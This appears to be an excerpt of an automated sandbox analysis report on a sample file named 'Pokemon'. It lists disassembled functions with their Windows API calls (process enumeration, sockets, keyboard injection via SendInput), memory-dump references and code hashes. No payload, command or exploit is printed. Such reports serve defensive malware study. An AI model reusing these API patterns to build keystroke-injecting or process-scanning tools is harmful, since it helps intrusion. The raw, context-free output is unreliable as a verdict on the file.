                                                                                                                                                                                                                                                                                      • Opcode ID: d044398e3b6a33e2d0deb3b0d7e1d105a983912a4c2273eb90430989337e4148
                                                                                                                                                                                                                                                                                      • Instruction ID: ab789203088f3a04a16134db881bec7d1af59f5aa1fb04ad3c179ec40fe5c994
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d044398e3b6a33e2d0deb3b0d7e1d105a983912a4c2273eb90430989337e4148
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D11E7716002096BCF11BF74DC85AFD77AA9F94310F008065BE099B693DF705949EB30
                                                                                                                                                                                                                                                                                      Function 00126321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00126360
                                                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0012638D
                                                                                                                                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 0012639C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                                      • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                      • Opcode ID: 9eb8d9f88ba96ae21f1b9611260281b0cd776f09daa8142d729c4e60dc8beb42
                                                                                                                                                                                                                                                                                      • Instruction ID: 830df520c61c5f65f7976bd11c24585f66319a7c25449e8a3102cee6272eb5c6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9eb8d9f88ba96ae21f1b9611260281b0cd776f09daa8142d729c4e60dc8beb42
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1018C71910228AFDB219F15EC84BEE7BB5FF44351F108099E84AD6191DB708AA6EF21
                                                                                                                                                                                                                                                                                      Function 000F096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: acad529ae0ac5ab7b03c8b5a09a469a20625d8e329f984d721a7e69576642008
                                                                                                                                                                                                                                                                                      • Instruction ID: 86692b1feea963d9fb1e5c57de8a9574d1e4303bf4310460ba59e7cb29e0efae
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acad529ae0ac5ab7b03c8b5a09a469a20625d8e329f984d721a7e69576642008
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9C13B75A0020AEFDB14CF94C894ABEB7B5FF48704F148598E605AB652D731EE81DB90
                                                                                                                                                                                                                                                                                      Function 000C41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                      • Instruction ID: bd2e756a4441d553fc9832b5206ff3de370cd095bac4499458d8ccacb3ce3fc9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41A14971D003869FEB25CF58C8A2FAEBBE5FF65314F2441ADE9959B242C3389941C750
                                                                                                                                                                                                                                                                                      Function 000F0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00130BD4,?), ref: 000F0EE0
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00130BD4,?), ref: 000F0EF8
                                                                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0012DCE0,000000FF,?,00000000,00000800,00000000,?,00130BD4,?), ref: 000F0F1D
                                                                                                                                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 000F0F3E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 411368cc9181b1261814f2c9b54d09bdad8a922fc458343ff9dd755f69d96118
                                                                                                                                                                                                                                                                                      • Instruction ID: d915c98d816bd4bafe1d2a20a9cecae9bee965b8f04cebf037b139863391f152
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 411368cc9181b1261814f2c9b54d09bdad8a922fc458343ff9dd755f69d96118
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19813A71A00109EFCB10DF94C984EEEB7B9FF89315F204558F606AB251DB71AE06DB60
                                                                                                                                                                                                                                                                                      Function 0011B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0011B10C
                                                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0011B11A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0011B1FC
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0011B20B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,000D4D73,?), ref: 000AE395
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1763a9bd0433bee7bfaa0372dab6965bd688585dc54f8436bc28ca5e81989188
                                                                                                                                                                                                                                                                                      • Instruction ID: bf4a9f9a4ac119bea9f1205c8860540f85d44f40400d71a6bc327a3a4d7d4cf0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1763a9bd0433bee7bfaa0372dab6965bd688585dc54f8436bc28ca5e81989188
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C514E71508300AFD710EF24D886A9FBBE8FF89754F40492DF58997252EB70E945CB92
                                                                                                                                                                                                                                                                                      Function 000D1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 79323f24de3e3bca3ff38ba8f07c6e262b1c29b2e2323cc672dac385c3c3bc11
                                                                                                                                                                                                                                                                                      • Instruction ID: 06d2db95f8edbcd5805b04028ab6e959ae99459d380c458c7e2d7deabf442207
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79323f24de3e3bca3ff38ba8f07c6e262b1c29b2e2323cc672dac385c3c3bc11
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C41E731A04301BADB31ABB99C85AFE3AF5EF45720F140627F818D73A2DE35484166B1
                                                                                                                                                                                                                                                                                      Function 00112533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 0011255A
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00112568
                                                                                                                                                                                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001125E7
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 001125F1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 65cfc605fe4928dccce0945c544490d918c419d75b9314ab3a575736bfbb4ada
                                                                                                                                                                                                                                                                                      • Instruction ID: 7d461abcd3829c8ae4cc018ff748bf791cc38c16a23f6650cf4a118436ac7104
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65cfc605fe4928dccce0945c544490d918c419d75b9314ab3a575736bfbb4ada
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5341C234A00200AFEB24AF24C886FA677A5AF45758F54C458F9199F2D3D771ED92CB90
                                                                                                                                                                                                                                                                                      Function 00126CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00126D1A
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00126D4D
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00126DBA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 92b782e328943f4fc5e41e110a15f044126e4be79e4899ee4f98147d678978f4
                                                                                                                                                                                                                                                                                      • Instruction ID: 41908af15e58c2767c9a5ea80e8c47db8efaf27c53ba3694f4d214da68f8bb10
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92b782e328943f4fc5e41e110a15f044126e4be79e4899ee4f98147d678978f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77515C35A00219EFCF24DFA4E8809AE7BB6FF94324F218159F9559B290D770ADA1CB50
                                                                                                                                                                                                                                                                                      Function 000CB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 65dafe10ba83fa9882c351288f5b248c7f5a4cb778a7111b0be492303dadecc2
                                                                                                                                                                                                                                                                                      • Instruction ID: 902b41f6e4e65f495b6c27a11005aa5220cd26487978a8c21e1378798ccaa178
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65dafe10ba83fa9882c351288f5b248c7f5a4cb778a7111b0be492303dadecc2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5441D471A40704AFD725AF78CC42FAEBBE9EF88710F10852EF511DB292DB71A9058790
                                                                                                                                                                                                                                                                                      Function 0010611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001061C8
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 001061EE
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00106213
                                                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0010623F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e87310708221b588e2564bad16860158bdb2a36a318a721135fdf428773f8384
                                                                                                                                                                                                                                                                                      • Instruction ID: 4238f1a6c5db7654841660d6e65d00bebc9eecfbd25d5676eb8c4b9118baeacd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e87310708221b588e2564bad16860158bdb2a36a318a721135fdf428773f8384
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B414E35600610DFCF21DF14C555A5DBBE2EF89710B19C488E88AAB3A2CB70FD41DB91
                                                                                                                                                                                                                                                                                      Function 000CDC43 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,000B70E1,00000000,00000000,000B8649,?,000B8649,?,00000001,000B70E1,8BE85006,00000001,000B8649,000B8649), ref: 000CDC90
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000CDD19
                                                                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000CDD2B
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000CDD34
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7d3260502b2aae6675e3dc6af3614b8568094b99bdfeca9bc25fce935fc89068
                                                                                                                                                                                                                                                                                      • Instruction ID: 0a095b290aa7f97ffcb269da1aefd8202b11b5a16e41bf70b9fe6798484a9f09
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d3260502b2aae6675e3dc6af3614b8568094b99bdfeca9bc25fce935fc89068
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231AE72A0020AABDF248F64DC85EEE7BB6EF40310B14416DFC05D6161EB35CD51CBA0
                                                                                                                                                                                                                                                                                      Function 000FB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 000FB473
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 000FB48F
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 000FB4FD
                                                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 000FB54F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5510dd6bfb799bc666b58f6c68405b1e8dd03488ead3719659712b57d75c9b6d
                                                                                                                                                                                                                                                                                      • Instruction ID: c6e86e3dbff53f1983b184874d7eb3f8f7324416367cf2221803862ae7e4a764
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5510dd6bfb799bc666b58f6c68405b1e8dd03488ead3719659712b57d75c9b6d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36314670A0060C6EFF30CB24DC057FE7BF5AB49710F18421AE696969D2C3789982AF61
